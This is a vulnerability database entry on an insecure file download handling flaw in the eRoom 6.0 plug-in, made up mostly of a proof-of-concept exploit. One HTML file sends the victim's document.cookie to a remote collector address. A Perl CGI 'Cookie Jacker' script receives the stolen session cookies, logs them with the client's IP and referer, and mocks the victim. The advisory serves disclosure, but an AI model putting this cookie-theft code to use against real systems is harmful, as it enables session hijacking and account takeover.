eRoom 6.0 Plug-In Insecure File Download Handling Vulnerability

2014-07-01T00:00:00
ID SSV:79601
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/14176/info

The eRoom plug-in is prone to an insecure file download handling vulnerability.

The issue is due to a design fault, where files that are shared by users are apparently passed to default file handlers when downloaded. This can occur without user knowledge, and can be a security risk for certain file types on certain platforms. 

 /* cookie.html */
  <html>
  <head>
    <title>Raiding the cookie jar</title>
  </head>
  <body>

  <br>
    <script>document.location='https://10.1.1.2/cgi-bin/cookie.cgi?' +document.cookie</script>
  <br>

  </body>
  </html>


  /* cookie.cgi */
  #!/usr/bin/perl
  use CGI qw(:standard);
  use CGI::Carp qw(warningsToBrowser fatalsToBrowser);
  use strict;

  my $break = "<br>";
  my $browser = $ENV{'HTTP_USER_AGENT'};
  my $cookie = $ENV{'QUERY_STRING'};
  my $remote = $ENV{'REMOTE_ADDR'};
  my $referer = $ENV{'HTTP_REFERER'};
  my $reqmeth = $ENV{'REQUEST_METHOD'};

  print header;

  print "<html>",
        "<head><title>Cookie Jacker</title></head>",
        "<center><h1>Yummy!</h1>",
        "ASPSESSIONID & SMSESSIONID could be useful for something? ;)",
        "$break$break$break$break",
        "<img src=\"/cookiemonster.jpg\">",
        "</center>",
        "$break$break$break$break\n";

  $cookie =~ s/;%20/$break/g;

  if($browser =~ /MSIE/) {
                print "Come on, is this the 90s or smtng!$break";
        } else {
                print "j00 are l33t$break";
  }

  print "Client connection came from $remote$break",
        "Refered by $referer$break",
        "Using $reqmeth$break$break",
        "$cookie\n";

  print end_html;